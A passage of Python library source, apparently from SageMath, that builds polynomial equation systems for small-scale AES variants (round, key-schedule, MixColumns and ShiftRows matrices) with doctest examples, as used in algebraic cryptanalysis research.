sage: sr.hex_str(A, typ='vector')
'1024'
"""
if typ == "matrix":
return self.hex_str_matrix(M)
elif typ == "vector":
return self.hex_str_vector(M)
else:
raise TypeError("parameter type must either be 'matrix' or 'vector'")
def hex_str_matrix(self, M):
r"""
Return a two-dimensional AES-like representation of the matrix M.
That is, show the finite field elements as hex strings.
INPUT:
- ``M`` - an AES state array
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: k = sr.base_ring()
sage: A = matrix(k, 2, 2, [1, k.gen(), 0, k.gen()^2])
sage: sr.hex_str_matrix(A)
' 1 2 \n 0 4 \n'
"""
e = M.base_ring().degree()
st = [""]
for x in range(M.nrows()):
for y in range(M.ncols()):
if e == 8:
st.append("%02X" % M[x, y].integer_representation())
else:
st.append("%X" % M[x, y].integer_representation())
st.append("\n")
return " ".join(st)
def hex_str_vector(self, M):
"""
Return a one-dimensional AES-like representation of the matrix M.
That is, show the finite field elements as hex strings.
INPUT:
- ``M`` - an AES state array
EXAMPLES::
sage: sr = mq.SR(2, 2, 2, 4)
sage: k = sr.base_ring()
sage: A = matrix(k, 2, 2, [1, k.gen(), 0, k.gen()^2])
sage: sr.hex_str_vector(A)
'1024'
"""
e = M.base_ring().degree()
st = [""]
for y in range(M.ncols()):
for x in range(M.nrows()):
if e == 8:
st.append("%02X" % M[x, y].integer_representation())
else:
st.append("%X" % M[x, y].integer_representation())
#st.append("\n")
return "".join(st)
def _insert_matrix_into_matrix(self, dst, src, row, col):
"""
Insert matrix src into matrix dst starting at row and col.
INPUT:
- ``dst`` - a matrix
- ``src`` - a matrix
- ``row`` - offset row
- ``col`` - offset columns
EXAMPLES::
sage: sr = mq.SR(10, 4, 4, 4)
sage: a = sr.k.gen()
sage: A = sr.state_array() + 1; A
[1 0 0 0]
[0 1 0 0]
[0 0 1 0]
[0 0 0 1]
sage: B = Matrix(sr.base_ring(), 2, 2, [0, a, a+1, a^2]); B
[ 0 a]
[a + 1 a^2]
sage: sr._insert_matrix_into_matrix(A, B, 1, 1)
[ 1 0 0 0]
[ 0 0 a 0]
[ 0 a + 1 a^2 0]
[ 0 0 0 1]
"""
for i in range(src.nrows()):
for j in range(src.ncols()):
dst[row+i, col+j] = src[i, j]
return dst
def varformatstr(self, name, n=None, rc=None, e=None):
"""
Return a format string which is understood by print et al.
If a numerical value is omitted, the default value of ``self``
is used. The numerical values (``n``, ``rc``, ``e``) are used
to determine the width of the respective fields in the format
string.
INPUT:
- ``name`` - name of the variable
- ``n`` - number of rounds (default: ``None``)
- ``rc`` - number of rows \* number of cols (default: ``None``)
- ``e`` - exponent of base field (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4)
sage: sr.varformatstr('x')
'x%01d%01d%01d'
sage: sr.varformatstr('x', n=1000)
'x%03d%03d%03d'
"""
if n is None:
n = self.n
if rc is None:
rc = self.r * self.c
if e is None:
e = self.e
l = str(max([ len(str(rc-1)), len(str(n-1)), len(str(e-1)) ] ))
if name not in ("k", "s"):
pf = self._postfix
else:
pf = ""
format_string = name + pf + "%0" + l + "d" + "%0" + l + "d" + "%0" + l + "d"
return format_string
def varstr(self, name, nr, rc, e):
"""
Return a string representing a variable for the small scale
AES subject to the given constraints.
INPUT:
- ``name`` - variable name
- ``nr`` - number of round to create variable strings for
- ``rc`` - row*column index in state array
- ``e`` - exponent of base field
EXAMPLES::
sage: sr = mq.SR(10, 1, 2, 4)
sage: sr.varstr('x', 2, 1, 1)
'x211'
"""
format_string = self.varformatstr(name, self.n, self.r*self.c, self.e)
return format_string % (nr, rc, e)
def varstrs(self, name, nr, rc = None, e = None):
"""
Return a list of strings representing variables in ``self``.
INPUT:
- ``name`` - variable name
- ``nr`` - number of round to create variable strings for
- ``rc`` - number of rows * number of columns in the state array (default: ``None``)
- ``e`` - exponent of base field (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(10, 1, 2, 4)
sage: sr.varstrs('x', 2)
('x200', 'x201', 'x202', 'x203', 'x210', 'x211', 'x212', 'x213')
"""
if rc is None:
rc = self.r * self.c
if e is None:
e = self.e
n = self._n
format_string = self.varformatstr(name, n, rc, e)
return tuple([format_string % (nr, rci, ei) for rci in range(rc) for ei in range(e)])
def vars(self, name, nr, rc=None, e=None):
"""
Return a list of variables in ``self``.
INPUT:
- ``name`` - variable name
        - ``nr`` - the round number to create variables for
        - ``rc`` - number of rows * number of columns in the state array (default: ``None``)
- ``e`` - exponent of base field (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(10, 1, 2, 4)
sage: sr.vars('x', 2)
(x200, x201, x202, x203, x210, x211, x212, x213)
"""
gd = self.variable_dict()
        return tuple([gd[v] for v in self.varstrs(name, nr, rc, e)])
def variable_dict(self):
"""
Return a dictionary to access variables in ``self.R`` by their
names.
EXAMPLES::
sage: sr = mq.SR(1,1,1,4)
sage: sr.variable_dict()
{'k000': k000,
'k001': k001,
'k002': k002,
'k003': k003,
'k100': k100,
'k101': k101,
'k102': k102,
'k103': k103,
's000': s000,
's001': s001,
's002': s002,
's003': s003,
'w100': w100,
'w101': w101,
'w102': w102,
'w103': w103,
'x100': x100,
'x101': x101,
'x102': x102,
'x103': x103}
sage: sr = mq.SR(1,1,1,4,gf2=True)
sage: sr.variable_dict()
{'k000': k000,
'k001': k001,
'k002': k002,
'k003': k003,
'k100': k100,
'k101': k101,
'k102': k102,
'k103': k103,
's000': s000,
's001': s001,
's002': s002,
's003': s003,
'w100': w100,
'w101': w101,
'w102': w102,
'w103': w103,
'x100': x100,
'x101': x101,
'x102': x102,
'x103': x103}
"""
        try:
            R, gd = self._variable_dict
            if R is self.R:
                return gd
        except AttributeError:
            pass
gd = self.R.gens_dict()
self._variable_dict = self.R,gd
return gd
def block_order(self):
"""
Return a block order for self where each round is a block.
EXAMPLES::
sage: sr = mq.SR(2, 1, 1, 4)
sage: sr.block_order()
Block term order with blocks:
(Degree lexicographic term order of length 16,
Degree lexicographic term order of length 16,
Degree lexicographic term order of length 4)
::
sage: P = sr.ring(order='block')
sage: print(P.repr_long())
Polynomial Ring
Base Ring : Finite Field in a of size 2^4
Size : 36 Variables
Block 0 : Ordering : deglex
Names : k200, k201, k202, k203, x200, x201, x202, x203, w200, w201, w202, w203, s100, s101, s102, s103
Block 1 : Ordering : deglex
Names : k100, k101, k102, k103, x100, x101, x102, x103, w100, w101, w102, w103, s000, s001, s002, s003
Block 2 : Ordering : deglex
Names : k000, k001, k002, k003
"""
r = self.r
c = self.c
e = self.e
n = self.n
T = None
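        # n blocks of size r*e + 3*r*c*e (the k, x, w and s variables of one
        # round each), followed by a final block of size r*c*e for the 0-th
        # (user-supplied) subkey; ring() lists the names so that the last
        # round fills the first block.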
for _n in range(n):
T = TermOrder('deglex', r*e + 3*r*c*e ) + T
T += TermOrder('deglex', r*c*e)
return T
def ring(self, order=None, reverse_variables=None):
r"""
Construct a ring as a base ring for the polynomial system.
        By default, variables are ordered in the reverse of their natural
        ordering, i.e. in the reverse of the order in which they appear.
INPUT:
- ``order`` - a monomial ordering (default: ``None``)
- ``reverse_variables`` - reverse rounds of variables (default: ``True``)
The variable assignment is as follows:
- `k_{i,j,l}` - subkey round `i` word `j` conjugate/bit `l`
- `s_{i,j,l}` - subkey inverse round `i` word `j` conjugate/bit `l`
- `w_{i,j,l}` - inversion input round `i` word `j` conjugate/bit `l`
- `x_{i,j,l}` - inversion output round `i` word `j` conjugate/bit `l`
Note that the variables are ordered in column major ordering
in the state array and that the bits are ordered in little
endian ordering.
        For example, if `x_{0,1,0}` is a variable over `\GF{2}` for
        `r=2` and `c=2`, then it refers to the *most* significant bit
        of the entry at position (1, 0) in the state array matrix.
EXAMPLES::
sage: sr = mq.SR(2, 1, 1, 4)
sage: P = sr.ring(order='block')
sage: print(P.repr_long())
Polynomial Ring
Base Ring : Finite Field in a of size 2^4
Size : 36 Variables
Block 0 : Ordering : deglex
Names : k200, k201, k202, k203, x200, x201, x202, x203, w200, w201, w202, w203, s100, s101, s102, s103
Block 1 : Ordering : deglex
Names : k100, k101, k102, k103, x100, x101, x102, x103, w100, w101, w102, w103, s000, s001, s002, s003
Block 2 : Ordering : deglex
Names : k000, k001, k002, k003
"""
r = self.r
c = self.c
e = self.e
n = self.n
if not self._gf2:
k = self.base_ring()
else:
k = GF(2)
if order is not None:
self._order = order
if self._order == 'block':
self._order = self.block_order()
if reverse_variables is None:
reverse_variables = self._reverse_variables
if reverse_variables:
process = lambda x: reversed(x)
else:
process = lambda x: x
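        # Collect the variable names round by round; with reverse_variables
        # (the default) the last round comes first and the 0-th subkey names
        # go last, matching the blocks produced by block_order().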
if reverse_variables:
names = []
else:
names = self.varstrs("k", 0, r*c, e)
for _n in process(list(range(n))):
names += self.varstrs("k", _n+1, r*c, e)
names += self.varstrs("x", _n+1, r*c, e)
names += self.varstrs("w", _n+1, r*c, e)
names += self.varstrs("s", _n, r, e)
if reverse_variables:
names += self.varstrs("k", 0, r*c, e)
#from sage.rings.polynomial.pbori import BooleanPolynomialRing
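        # Total number of variables: x and w for every round (2*n*r*c*e),
        # n+1 subkeys of r*c*e bits/conjugates each, and n blocks of r*e
        # key-schedule variables s.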
if self._gf2 and self._polybori:
return BooleanPolynomialRing(2*n*r*c*e + (n+1)*r*c*e + n*r*e, names, order=self._order)
else:
return PolynomialRing(k, 2*n*r*c*e + (n+1)*r*c*e + n*r*e, names, order=self._order)
def round_polynomials(self, i, plaintext=None, ciphertext=None):
r"""
Return list of polynomials for a given round `i`.
        If ``i == 0``, a plaintext must be provided; if ``i == n``, a
        ciphertext must be provided.
INPUT:
- ``i`` - round number
- ``plaintext`` - optional plaintext (mandatory in
first round)
- ``ciphertext`` - optional ciphertext (mandatory in
last round)
OUTPUT: tuple
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4)
sage: k = sr.base_ring()
sage: p = [k.random_element() for _ in range(sr.r*sr.c)]
sage: sr.round_polynomials(0, plaintext=p)
(w100 + k000 + (a^2 + 1), w101 + k001 + (a), w102 + k002 + (a^2), w103 + k003 + (a + 1))
"""
r = self._r
c = self._c
e = self._e
n = self._n
R = self.R
M = self.M
_vars = self.vars
if i == 0:
w1 = Matrix(R, r*c*e, 1, _vars("w", 1, r*c, e))
k0 = Matrix(R, r*c*e, 1, _vars("k", 0, r*c, e))
if isinstance(plaintext, (tuple, list)) and len(plaintext) == r*c:
plaintext = Matrix(R, r*c*e, 1, self.phi(plaintext))
return tuple((w1 + k0 + plaintext).list())
elif i>0 and i<=n:
if self._star and i == n:
M = self.Mstar
xj = Matrix(R, r*c*e, 1, _vars("x", i, r*c, e))
ki = Matrix(R, r*c*e, 1, _vars("k", i, r*c, e))
rcon = Matrix(R, r*c*e, 1, self.phi([self.sbox_constant()]*r*c))
if i < n:
wj = Matrix(R, r*c*e, 1, _vars("w", i+1, r*c, e))
if i == n:
if isinstance(ciphertext, (tuple, list)) and len(ciphertext) == r*c:
ciphertext = Matrix(R, r*c*e, 1, self.phi(ciphertext))
wj = ciphertext
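            # Linear layer: the inversion inputs of the next round satisfy
            # w_{i+1} = M*x_i + k_i + rcon, written below as the polynomials
            # w_{i+1} + k_i + M*x_i + rcon (characteristic 2); the S-box part
            # then relates x_i to w_i via inversion and field relations.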
lin = (wj + ki + M * xj + rcon).list()
wi = Matrix(R, r*c*e, 1, _vars("w", i, r*c, e))
xi = Matrix(R, r*c*e, 1, _vars("x", i, r*c, e))
sbox = []
sbox += self.inversion_polynomials(xi, wi, r*c*e)
sbox += self.field_polynomials("x", i)
sbox += self.field_polynomials("w", i)
return tuple(lin + sbox)
    def key_schedule_polynomials(self, i):
        r"""
Return polynomials for the `i`-th round of the key
schedule.
INPUT:
- ``i`` - round (`0 \leq i \leq n`)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4, gf2=True, polybori=False)
        The 0-th subkey is the user-provided key, so only conjugacy
        relations or field polynomials are added::
sage: sr.key_schedule_polynomials(0)
(k000^2 + k000, k001^2 + k001, k002^2 + k002, k003^2 + k003)
        The first subkey is derived from the user-provided key according to
        the key schedule, which is non-linear::
sage: sr.key_schedule_polynomials(1)
(k100 + s000 + s002 + s003,
k101 + s000 + s001 + s003 + 1,
k102 + s000 + s001 + s002 + 1,
k103 + s001 + s002 + s003 + 1,
k100^2 + k100, k101^2 + k101, k102^2 + k102, k103^2 + k103,
s000^2 + s000, s001^2 + s001, s002^2 + s002, s003^2 + s003,
s000*k000 + s000*k003 + s001*k002 + s002*k001 + s003*k000,
s000*k000 + s000*k001 + s001*k000 + s001*k003 + s002*k002 + s003*k001,
s000*k001 + s000*k002 + s001*k000 + s001*k001 + s002*k000 + s002*k003 + s003*k002,
s000*k000 + s000*k001 + s000*k003 + s001*k001 + s002*k000 + s002*k002 + s003*k000 + k000,
s000*k002 + s001*k000 + s001*k001 + s001*k003 + s002*k001 + s003*k000 + s003*k002 + k001,
s000*k000 + s000*k001 + s000*k002 + s001*k002 + s002*k000 + s002*k001 + s002*k003 + s003*k001 + k002,
s000*k001 + s001*k000 + s001*k002 + s002*k000 + s003*k001 + s003*k003 + k003,
s000*k000 + s000*k002 + s000*k003 + s001*k000 + s001*k001 + s002*k002 + s003*k000 + s000,
s000*k001 + s000*k003 + s001*k001 + s001*k002 + s002*k000 + s002*k003 + s003*k001 + s001,
s000*k000 + s000*k002 + s001*k000 + s001*k002 + s001*k003 + s002*k000 + s002*k001 + s003*k002 + s002,
s000*k001 + s000*k002 + s001*k000 + s001*k003 + s002*k001 + s003*k003 + s003,
s000*k002 + s001*k001 + s002*k000 + s003*k003 + 1)
"""
R = self.R
r = self.r
e = self.e
c = self.c
k = self.k
a = k.gen()
if i < 0:
            raise TypeError("i must be >= 0")
if i == 0:
return tuple(self.field_polynomials("k", i, r*c))
else:
L = self.lin_matrix(r)
ki = Matrix(R, r*c*e, 1, self.vars("k", i , r*c, e))
kj = Matrix(R, r*c*e, 1, self.vars("k", i-1, r*c, e))
si = Matrix(R, r*e, 1, self.vars("s", i-1, r, e))
rc = Matrix(R, r*e, 1, self.phi([a**(i-1)] + [k(0)]*(r-1)) )
d = Matrix(R, r*e, 1, self.phi([self.sbox_constant()]*r) )
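            # The last column of the previous subkey is matched with the
            # S-box variables s (using the AES RotWord rotation when r == 4
            # and aes_mode is set); si = L*si + d + rc then applies the
            # affine part of the S-box and the round constant, and column q
            # of the new subkey is si plus the sum of columns 0..q of the
            # previous subkey.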
sbox = []
sbox += self.field_polynomials("k", i)
sbox += self.field_polynomials("s", i-1, r)
if r == 1:
sbox += self.inversion_polynomials(kj[(c - 1)*e:(c - 1)*e + e], si[0:e], e)
if r == 2:
sbox += self.inversion_polynomials( kj[(2*c -1)*e : (2*c -1)*e + e] , si[0:1*e], e )
sbox += self.inversion_polynomials( kj[(2*c -2)*e : (2*c -2)*e + e] , si[e:2*e], e )
if r == 4:
if self._aes_mode:
sbox += self.inversion_polynomials( kj[(4*c-3)*e : (4*c-3)*e + e] , si[0*e : 1*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-2)*e : (4*c-2)*e + e] , si[1*e : 2*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-1)*e : (4*c-1)*e + e] , si[2*e : 3*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-4)*e : (4*c-4)*e + e] , si[3*e : 4*e] , e )
else:
sbox += self.inversion_polynomials( kj[(4*c-1)*e : (4*c-1)*e + e] , si[0*e : 1*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-2)*e : (4*c-2)*e + e] , si[1*e : 2*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-3)*e : (4*c-3)*e + e] , si[2*e : 3*e] , e )
sbox += self.inversion_polynomials( kj[(4*c-4)*e : (4*c-4)*e + e] , si[3*e : 4*e] , e )
si = L * si + d + rc
Sum = Matrix(R, r*e, 1)
lin = []
if c > 1:
for q in range(c):
t = list(range(r*e*(q) , r*e*(q+1)))
Sum += kj.matrix_from_rows(t)
lin += (ki.matrix_from_rows(t) + si + Sum).list()
else:
lin += (ki + si).list()
return tuple(lin + sbox)
def polynomial_system(self, P=None, K=None, C=None):
"""
Return a polynomial system for this small scale AES variant for a
given plaintext-key pair.
        If none of ``P``, ``K`` or ``C`` is provided, a random pair
        (``P``, ``K``) will be generated. If ``P`` and ``C`` are
        provided, no ``K`` needs to be provided.
INPUT:
- ``P`` - vector, list, or tuple (default: ``None``)
- ``K`` - vector, list, or tuple (default: ``None``)
- ``C`` - vector, list, or tuple (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4, gf2=True, polybori=True)
sage: P = sr.vector([0, 0, 1, 0])
sage: K = sr.vector([1, 0, 0, 1])
sage: F, s = sr.polynomial_system(P, K)
This returns a polynomial system::
sage: F
Polynomial Sequence with 36 Polynomials in 20 Variables
and a solution::
sage: s # random -- maybe we need a better doctest here?
{k000: 1, k001: 0, k003: 1, k002: 0}
This solution is not the only solution that we can learn from the
Groebner basis of the system.
::
sage: F.groebner_basis()[-3:]
[k000 + 1, k001, k003 + 1]
In particular we have two solutions::
sage: len(F.ideal().variety())
2
In the following example we provide ``C`` explicitly::
sage: C = sr(P,K)
sage: F,s = sr.polynomial_system(P=P, C=C)
sage: F
Polynomial Sequence with 36 Polynomials in 20 Variables
Alternatively, we can use symbols for the ``P`` and
``C``. First, we have to create a polynomial ring::
sage: sr = mq.SR(1, 1, 1, 4, gf2=True, polybori=True)
sage: R = sr.R
sage: vn = sr.varstrs("P",0,1,4) + R.variable_names() + sr.varstrs("C",0,1,4)
sage: R = BooleanPolynomialRing(len(vn),vn)
sage: sr.R = R
Now, we can construct the purely symbolic equation system::
sage: C = sr.vars("C",0); C
(C000, C001, C002, C003)
sage: P = sr.vars("P",0)
sage: F,s = sr.polynomial_system(P=P,C=C)
sage: [(k,v) for k,v in sorted(s.items())] # this can be ignored
[(k003, 1), (k002, 1), (k001, 0), (k000, 1)]
sage: F
Polynomial Sequence with 36 Polynomials in 28 Variables
sage: F.part(0)
(P000 + w100 + k000, P001 + w101 + k001, P002 + w102 + k002, P003 + w103 + k003)
sage: F.part(-2)
(k100 + x100 + x102 + x103 + C000, k101 + x100 + x101 + x103 + C001 + 1, ...)
We show that the (returned) key is a solution to the returned system::
sage: sr = mq.SR(3,4,4,8, star=True, gf2=True, polybori=True)
sage: F,s = sr.polynomial_system()
sage: F.subs(s).groebner_basis() # long time
Polynomial Sequence with 1248 Polynomials in 1248 Variables
"""
plaintext = P
key = K
ciphertext = C
system = []
n = self._n
data = []
R = self.R
r,c,e = self.r,self.c,self.e
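        # Normalise P, K and C to column vectors over self.R: state arrays,
        # GF(2)/base-field lists and ready-made vectors are all accepted;
        # None is kept and filled in below, anything else is flagged False.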
for d in (plaintext, key, ciphertext):
if d is None:
data.append( None )
elif isinstance(d, (tuple, list)):
if isinstance(d[0], integer_types):
d = [GF(2)(_) for _ in d]
if len(d) == r*c*e and (d[0].parent() is R or d[0].parent() == R):
data.append( Matrix(R,r*c*e,1,d) )
continue
try:
data.append( self.phi(self.state_array(d)) )
except ValueError: # GF2 vectors maybe?
data.append( self.vector(d) )
elif self.is_state_array(d):
data.append( self.phi(d) )
elif self.is_vector(d):
data.append( d )
else:
data.append( False )
plaintext, key, ciphertext = data
if plaintext is False:
raise TypeError("type %s of P not understood"%(type(plaintext)))
elif plaintext is None:
plaintext = self.random_element("vector")
if key is None:
key = self.random_element("vector")
elif key is False and ciphertext is False:
raise TypeError("type %s of K not understood"%(type(key)))
if ciphertext is None:
ciphertext = self(plaintext, key)
elif ciphertext is False:
raise TypeError("type %s of C not understood"%(type(ciphertext)))
for i in range(n+1):
system.append( self.round_polynomials(i, plaintext, ciphertext) )
system.append( self.key_schedule_polynomials(i) )
if key is not None:
K = dict(zip(self.vars("k", 0), key.list()))
else:
K = None
return PolynomialSequence(self.R, system), K
class SR_gf2n(SR_generic):
r"""
Small Scale Variants of the AES polynomial system constructor over
`\GF{2^n}`.
"""
def vector(self, d=None):
"""
Constructs a vector suitable for the algebraic representation of
SR, i.e. BES.
INPUT:
- ``d`` - values for vector, must be understood by ``self.phi`` (default:``None``)
EXAMPLES::
sage: sr = mq.SR()
sage: sr
SR(1,1,1,4)
sage: k = sr.base_ring()
sage: A = Matrix(k, 1, 1, [k.gen()])
sage: sr.vector(A)
[ a]
[ a^2]
[ a + 1]
[a^2 + 1]
"""
r = self.r
c = self.c
e = self.e
k = self.base_ring()
if d is None:
return Matrix(k, r*c*e, 1)
elif d.ncols() == c and d.nrows() == r and d.base_ring() == k:
return Matrix(k, r*c*e, 1, self.phi(d).transpose().list())
def is_vector(self, d):
"""
Return ``True`` if ``d`` can be used as a vector for ``self``.
EXAMPLES::
sage: sr = mq.SR()
sage: sr
SR(1,1,1,4)
sage: k = sr.base_ring()
sage: A = Matrix(k, 1, 1, [k.gen()])
sage: B = sr.vector(A)
sage: sr.is_vector(A)
False
sage: sr.is_vector(B)
True
"""
return is_Matrix(d) and \
d.nrows() == self.r*self.c*self.e and \
d.ncols() == 1 and \
d.base_ring() == self.base_ring()
def phi(self, l):
r"""
The operation `\phi` from [MR2002]_
Projects state arrays to their algebraic representation.
INPUT:
- ``l`` - element to perform `\phi` on.
EXAMPLES::
sage: sr = mq.SR(2, 1, 2, 4)
sage: k = sr.base_ring()
sage: A = matrix(k, 1, 2, [k.gen(), 0] )
sage: sr.phi(A)
[ a 0]
[ a^2 0]
[ a + 1 0]
[a^2 + 1 0]
"""
ret = []
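        # Replace every entry b by its e conjugates b, b^2, b^4, ...,
        # b^(2^(e-1)) -- the BES-style embedding used throughout SR_gf2n.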
        if is_Matrix(l):
            for b in l.transpose().list():
                ret += [b**(2**i) for i in range(self.e)]
        else:
            for b in l:
                ret += [b**(2**i) for i in range(self.e)]
if isinstance(l, list):
return ret
elif isinstance(l, tuple):
return tuple(ret)
elif is_Matrix(l):
return Matrix(l.base_ring(), l.ncols(), l.nrows()*self.e, ret).transpose()
else:
raise TypeError
    def antiphi(self, l):
        r"""
The operation `\phi^{-1}` from [MR2002]_ or the inverse of ``self.phi``.
INPUT:
- ``l`` -- a vector in the sense of :meth:`is_vector`
EXAMPLES::
sage: sr = mq.SR()
sage: A = sr.random_state_array()
sage: A
[a^2]
sage: sr.antiphi(sr.phi(A)) == A
True
"""
if is_Matrix(l):
ret = [e for e in l.transpose().list()[0:-1:self.e]]
else:
ret = [e for e in l[0:-1:self.e]]
if isinstance(l, list):
return ret
elif isinstance(l, tuple):
return tuple(ret)
elif is_Matrix(l):
return Matrix(self.base_ring(), l.ncols(), l.nrows() // self.e,
ret).transpose()
else:
raise TypeError
def shift_rows_matrix(self):
"""
Return the ``ShiftRows`` matrix.
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4)
sage: s = sr.random_state_array()
sage: r1 = sr.shift_rows(s)
sage: r2 = sr.state_array( sr.shift_rows_matrix() * sr.vector(s) )
sage: r1 == r2
True
"""
e = self.e
r = self.r
c = self.c
k = self.base_ring()
bs = r*c*e
shift_rows = Matrix(k, bs, bs)
I = MatrixSpace(k, e, e)(1)
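        # The output word in row y, column x is read from the input word in
        # row y, column (x+y) mod c; ((x*r) + (r+1)*y)*e mod bs is the column
        # offset of that word's e-dimensional identity block.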
for x in range(0, c):
for y in range(0, r):
_r = ((x*r)+y) * e
_c = (((x*r)+((r+1)*y)) * e) % bs
self._insert_matrix_into_matrix(shift_rows, I, _r, _c)
return shift_rows
def lin_matrix(self, length = None):
"""
Return the ``Lin`` matrix.
If no ``length`` is provided, the standard state space size is
used. The key schedule calls this method with an explicit
length argument because only ``self.r`` S-Box applications are
performed in the key schedule.
INPUT:
- ``length`` - length of state space (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 4)
sage: sr.lin_matrix()
[ a^2 + 1 1 a^3 + a^2 a^2 + 1]
[ a a 1 a^3 + a^2 + a + 1]
[ a^3 + a a^2 a^2 1]
[ 1 a^3 a + 1 a + 1]
"""
r = self.r
c = self.c
e = self.e
k = self.k
if length is None:
length = r*c
lin = Matrix(self.base_ring(), length*e, length*e)
if e == 4:
l = [ k.fetch_int(x) for x in (5, 1, 12, 5) ]
            for b in range(0, length):
                for i in range(0, 4):
                    for j in range(0, 4):
                        lin[b*4 + j, b*4 + i] = l[(i - j) % 4]**(2**j)
elif e == 8:
l = [ k.fetch_int(x) for x in (5, 9, 249, 37, 244, 1, 181, 143) ]
            for b in range(0, length):
                for i in range(0, 8):
                    for j in range(0, 8):
                        lin[b*8 + j, b*8 + i] = l[(i - j) % 8]**(2**j)
return lin
def mix_columns_matrix(self):
"""
Return the ``MixColumns`` matrix.
EXAMPLES::
sage: sr = mq.SR(1, 2, 2, 4)
sage: s = sr.random_state_array()
sage: r1 = sr.mix_columns(s)
sage: r2 = sr.state_array(sr.mix_columns_matrix() * sr.vector(s))
sage: r1 == r2
True
"""
def D(b):
"""
Return the `e x e` matrix `D` with `b^i` along the
diagonal.
EXAMPLES::
sage: sr = mq.SR(1, 2, 1, 4)
sage: sr.mix_columns_matrix() # indirect doctest
[ a + 1 0 0 0 a 0 0 0]
[ 0 a^2 + 1 0 0 0 a^2 0 0]
[ 0 0 a 0 0 0 a + 1 0]
[ 0 0 0 a^2 0 0 0 a^2 + 1]
[ a 0 0 0 a + 1 0 0 0]
[ 0 a^2 0 0 0 a^2 + 1 0 0]
[ 0 0 a + 1 0 0 0 a 0]
[ 0 0 0 a^2 + 1 0 0 0 a^2]
"""
D = Matrix(self.base_ring(), self._e, self._e)
for i in range(self._e):
D[i, i] = b**(2**i)
return D
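        # Build the r*e x r*e MixColumns block as a circulant of D-blocks:
        # rows (a, a+1, 1, 1) for r = 4, (a+1, a) for r = 2 and the identity
        # for r = 1, where D(b) lifts multiplication by b to all e conjugates.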
r = self.r
c = self.c
e = self.e
k = self.k
a = k.gen()
M = Matrix(k, r*e, r*e)
if r == 1:
self._insert_matrix_into_matrix(M, D(1), 0, 0)
elif r == 2:
self._insert_matrix_into_matrix(M, D(a+1), 0, 0)
self._insert_matrix_into_matrix(M, D(a+1), e, e)
self._insert_matrix_into_matrix(M, D(a), e, 0)
self._insert_matrix_into_matrix(M, D(a), 0, e)
elif r == 4:
self._insert_matrix_into_matrix(M, D(a), 0, 0)
self._insert_matrix_into_matrix(M, D(a), e, e)
self._insert_matrix_into_matrix(M, D(a), 2*e, 2*e)
self._insert_matrix_into_matrix(M, D(a), 3*e, 3*e)
self._insert_matrix_into_matrix(M, D(a+1), 0, e)
self._insert_matrix_into_matrix(M, D(a+1), e, 2*e)
self._insert_matrix_into_matrix(M, D(a+1), 2*e, 3*e)
self._insert_matrix_into_matrix(M, D(a+1), 3*e, 0)
self._insert_matrix_into_matrix(M, D(1), 0, 2*e)
self._insert_matrix_into_matrix(M, D(1), e, 3*e)
self._insert_matrix_into_matrix(M, D(1), 2*e, 0)
self._insert_matrix_into_matrix(M, D(1), 3*e, 1*e)
self._insert_matrix_into_matrix(M, D(1), 0, 3*e)
self._insert_matrix_into_matrix(M, D(1), e, 0)
self._insert_matrix_into_matrix(M, D(1), 2*e, 1*e)
self._insert_matrix_into_matrix(M, D(1), 3*e, 2*e)
mix_columns = Matrix(k, r*c*e, r*c*e)
for i in range(c):
self._insert_matrix_into_matrix(mix_columns, M, r*e*i, r*e*i)
return mix_columns
def inversion_polynomials(self, xi, wi, length):
"""
Return polynomials to represent the inversion in the AES S-Box.
INPUT:
- ``xi`` - output variables
- ``wi`` - input variables
- ``length`` - length of both lists
EXAMPLES::
sage: sr = mq.SR(1, 1, 1, 8)
sage: R = sr.ring()
sage: xi = Matrix(R, 8, 1, sr.vars('x', 1))
sage: wi = Matrix(R, 8, 1, sr.vars('w', 1))
sage: sr.inversion_polynomials(xi, wi, 8)
[x100*w100 + 1,
x101*w101 + 1,
x102*w102 + 1,
x103*w103 + 1,
x104*w104 + 1,
x105*w105 + 1,
x106*w106 + 1,
x107*w107 + 1]
"""
return [xi[j, 0]*wi[j, 0] + 1 for j in range(length)]
    def field_polynomials(self, name, i, l=None):
        r"""
Return list of conjugacy polynomials for a given round ``i``
and name ``name``.
INPUT:
- ``name`` - variable name
- ``i`` - round number
- ``l`` - r\*c (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(3, 1, 1, 8)
sage: sr.field_polynomials('x', 2)
[x200^2 + x201,
x201^2 + x202,
x202^2 + x203,
x203^2 + x204,
x204^2 + x205,
x205^2 + x206,
x206^2 + x207,
x207^2 + x200]
"""
r = self._r
c = self._c
e = self._e
n = self._n
if l is None:
l = r*c
_vars = self.vars(name, i, l, e)
return [_vars[e*j+i]**2 - _vars[e*j+(i+1)%e] for j in range(l) for i in range(e)]
class SR_gf2(SR_generic):
def __init__(self, n=1, r=1, c=1, e=4, star=False, **kwargs):
r"""
Small Scale Variants of the AES polynomial system constructor over
`\GF{2}`. See help for SR.
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: sr
SR(1,1,1,4)
"""
SR_generic.__init__(self, n, r, c, e, star, **kwargs)
self._correct_only = kwargs.get("correct_only", False)
self._biaffine_only = kwargs.get("biaffine_only", True)
def vector(self, d=None):
"""
Constructs a vector suitable for the algebraic representation of
SR.
INPUT:
- ``d`` - values for vector (default: ``None``)
EXAMPLES::
sage: sr = mq.SR(gf2=True)
sage: sr
SR(1,1,1,4)
sage: k = sr.base_ring()
sage: A = Matrix(k, 1, 1, [k.gen()])
sage: sr.vector(A)
[0]
[0]
[1]
[0]
"""
r = self.r
c = self.c
e = self.e
k = GF(2)
if d is None:
return Matrix(k, r*c*e, 1)
elif is_Matrix(d) and d.ncols() == c and d.nrows() == r and d.base_ring() == self.k:
l = flatten([self.phi(x) for x in d.transpose().list()], (Vector_modn_dense,list,tuple))
return Matrix(k, r*c*e, 1, l)
